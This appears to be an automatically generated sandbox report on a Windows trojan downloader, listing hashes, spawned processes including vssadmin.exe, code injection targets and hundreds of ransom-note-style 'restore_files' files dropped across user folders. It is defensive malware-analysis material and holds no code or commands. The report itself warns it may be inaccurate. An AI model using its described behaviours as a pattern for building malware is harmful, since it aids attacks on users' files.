Trojan-Downloader.Win32.Upatre.epwd (Kaspersky), Trojan.Generic.14940836 (B) (Emsisoft), Trojan.Generic.14940836 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 52b828a3d2c1058ab80feed23e7e81ba
SHA1: 897366ba9e87e5145db102a7e4f8366f84bcb621
SHA256: 553429c750d6e5b880a392a6e2543cfc6fc9f542b7d17ff5931ace3503384e64
SSDeep: 3072:oUcCifHkS7ZRIWmibtel zzvcFA4u2WXuku8ukyIY:rf6ZRYibwS7ci4u2WXuku8ukRY
Size: 176128 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-08-29 12:22:18
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
bhtydrhbtr.exe:1252
%original file name%.exe:396
vssadmin.exe:1244
bryehretgw.exe:1160
The Trojan injects its code into the following process(es):
vcwuwa.exe:1980
bryehretgw.exe:1900
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process bhtydrhbtr.exe:1252 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\vcwuwa.exe (2105 bytes)
The process %original file name%.exe:396 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bgdfcffc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bhtyhtvfse.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vgregwr.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\1[1].htm (649720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2[1].htm (129192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bryehretgw.exe (129490 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bhtydrhbtr.exe (650032 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bttrbyerfd.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dwtetevf.exe (0 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bgdfcffc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bhtyhtvfse.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vgregwr.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bttrbyerfd.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dwtetevf.exe (0 bytes)
The process vcwuwa.exe:1980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\37\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\muffin\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\14\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\WinPcap\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\59\restore_files_fyiyk.html (5 bytes)
C:\System Volume Information\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Templates\powerpnt.ppt (454 bytes)
%Documents and Settings%\NetworkService\Local Settings\History\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\My Documents\My Music\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\UserData\KTOR0Z81\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\48\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\53\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\33\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\63\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Forms\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Media Player\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\40\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Playlists\00064D96\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\S-1-5-20\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Identities\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\My Documents\Recovery_File_koseqijge.txt (250 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\12\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\Entertainment\restore_files_fyiyk.html (5 bytes)
C:\RECYCLER\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\22\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\E7VJ4HGS\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\0\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Desktop\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\6\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Media Player\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\Accessibility\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#kiks.yandex.ru\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Favorites\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\0\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\51\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\19\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\51\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\4\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\12\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\53\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\16\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\16\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\19\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-19\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Playlists\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\56\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\55\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Protect\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\2\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\43\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\History\History.IE5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\48\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\3\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\History\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\29\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Desktop\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\jre1.6.0_18\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\Certificates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Templates\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\57\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\SendTo\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\History\History.IE5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Identities\{37E80C13-CB45-4DCE-A438-545B791476AC}\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Total Commander\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\History\History.IE5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\41\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\My Documents\My Pictures\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\1\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\UserData\KTOR0Z81\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\S-1-5-19\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\15\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\12\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Recent\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\My Documents\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\HTML Help\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Startup\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\31\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\4\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\18\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Cookies\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Recent\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\34\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Start Menu\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\11\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\60\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CTLs\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\2\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\13\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\7\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\48\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg (1181 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\41\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ip[1].htm (15 bytes)
C:\totalcmd\LANGUAGE\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\44\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\6\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\36\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\28\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\27\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Windows\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Application Data\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Cookies\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\Install\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\14\restore_files_fyiyk.html (5 bytes)
C:\System Volume Information\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temp\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\restore_files_fyiyk.txt (2 bytes)
C:\totalcmd\DEFAULT.BAR (2816 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\14\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\Media Player\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Collab\restore_files_fyiyk.html (5 bytes)
%System%\config\software (2374 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\My Documents\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\51\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\8\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\15\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\46\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Favorites\Links\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-20\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\45\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Forms\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\49\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\22\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\35\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Wireshark\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\53\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\CRLs\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Wireshark\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Documents\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\8\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Documents\My Videos\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\29\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\46\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\NetworkService\Local Settings\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\34\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\29\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\25\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\WinPcap\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\Default User\My Documents\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\restore_files_fyiyk.html (5 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\System Tools\restore_files_fyiyk.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\restore_files_fyiyk.html (5 bytes)
